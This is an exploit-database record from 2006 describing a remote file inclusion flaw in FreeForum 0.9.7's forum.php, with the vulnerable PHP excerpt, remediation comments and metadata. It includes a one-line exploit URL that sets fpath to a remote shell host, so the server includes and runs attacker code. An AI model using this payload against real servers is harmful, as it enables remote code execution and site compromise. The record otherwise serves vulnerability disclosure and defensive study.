ID EXPLOITPACK:06C72F523F25F923E634FC847D550C1A
Type exploitpack
Reporter Mehmet Ince
Modified 2006-10-07T00:00:00
Description
FreeForum 0.9.7 - forum.php Remote File Inclusion
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
FreeForum 0.9.7 (fpath) Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by XORON(turkish hacker)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://www.ezforum.de/downloads/Forum.zip (229kb)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
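Vuln. Code: in forum.php. $fpath is given a default only when it is not already set, and is then used in include() without any validation.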
// Excerpt from forum.php as quoted in this advisory. Each variable below receives
// a default only when it is not already set; nothing in this excerpt assigns them
// unconditionally.
if(!isset($cfg_file))$cfg_file="config/config.inc.php";
// $fpath falls back to "." only if unset. The advisory reports that it can be set
// from the query string (consistent with register_globals-style variable import;
// that mechanism is not visible in this excerpt), so a pre-set value survives here.
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
// Root cause: $fpath is interpolated into the include() path with no validation.
// Remediation: assign $fpath unconditionally to a fixed server-side directory (or
// check it against an allow-list) before this call. Disabling register_globals and
// allow_url_fopen / allow_url_include in php.ini reduces exposure as defence in depth.
include("$fpath/lib/php/classes.php");
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# milw0rm.com [2006-10-07]
{"lastseen": "2020-04-01T19:04:16", "references": [], "description": "\nFreeForum 0.9.7 - forum.php Remote File Inclusion", "edition": 1, "reporter": "Mehmet Ince", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-10-07T00:00:00", "title": "FreeForum 0.9.7 - forum.php Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:16", "rev": 2}, "score": {"value": 0.7, "vector": "NONE", "modified": "2020-04-01T19:04:16", "rev": 2}, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-10-07T00:00:00", "id": "EXPLOITPACK:06C72F523F25F923E634FC847D550C1A", "href": "", "viewCount": 3, "sourceData": "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nFreeForum 0.9.7 (fpath) Remote File Include Vulnerability\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nDiscovered by XORON(turkish hacker)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nURL: http://www.ezforum.de/downloads/Forum.zip (229kb)\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nVuln. Code: in forum.php.\n\nif(!isset($cfg_file))$cfg_file=\"config/config.inc.php\";\nif(!isset($fpath))$fpath=\".\";\nif(!isset($getvar))$getvar='';\ninclude(\"$fpath/lib/php/classes.php\");\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nExploit: /forum.php?cfg_file=1&fpath=http://sh3LL?\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\nThanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,\n\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n# milw0rm.com [2006-10-07]", "cvss": {"score": 0.0, "vector": "NONE"}}
{}